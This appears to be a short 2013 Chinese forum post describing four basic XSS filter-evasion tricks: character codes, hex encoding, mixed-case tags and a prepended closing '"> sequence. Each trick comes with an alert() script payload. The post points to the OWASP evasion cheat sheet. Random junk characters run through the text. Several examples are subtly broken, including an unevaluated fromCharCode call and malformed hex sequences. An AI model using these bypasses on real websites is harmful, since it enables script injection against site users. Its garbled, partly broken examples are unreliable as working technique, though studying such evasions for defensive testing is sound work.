四种超级基础的绕过方法。1 ~# [2 F! u3 _* ]$ p" y6 a
1.转换为ASCII码
" P" ?* `1 P/ I1 P, t& y例子:原脚本为<script>alert(‘I love F4ck’)</script >1 u" C8 ~; c' d: s! Z( {
通过转换,变成:2 n- _ Q" x3 i2 d$ q8 U; g
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>4 _- I$ P0 h" j. }
% S3 n5 l& P( L
2.转换为HEX(十六进制)! }# `4 m7 [1 G6 Z
例子:原脚本为<script>alert(‘I love F4ck’)</script>- q3 o+ W* A. k( v! P3 h f% f+ @# B
通过转换,变成:) l; _. F1 W" T! G8 K
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
3 B! F9 i6 o) z4 c6 m
- @0 K& M7 U! f2 ~- f) Z/ s3.转换脚本的大小写
1 e# C S# c8 A$ J0 |例子:原脚本为<script>alert(‘I love F4ck’)</script>( U8 b( ]& k; l5 i% o
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>- _4 o( D- b+ ?& m2 V4 p# L
: \9 l3 m+ @8 A4.增加闭合标记”>! Z4 w8 y& C; o6 ?: I }
例子:原脚本为<script>alert(‘I love F4ck’)</script>- ?5 _( J# O# K* J1 c+ P) H* E5 a9 B
转换为:”><script>alert(‘I love F4ck’)</script>4 ]# n9 l/ ^" F
更详细绕过技术请参考此网页
$ q: ^3 j5 X; \0 `, A0 uhttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet1 h- t# V# m( J, j8 H+ N. k
( j* |7 B! l6 _" C U转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对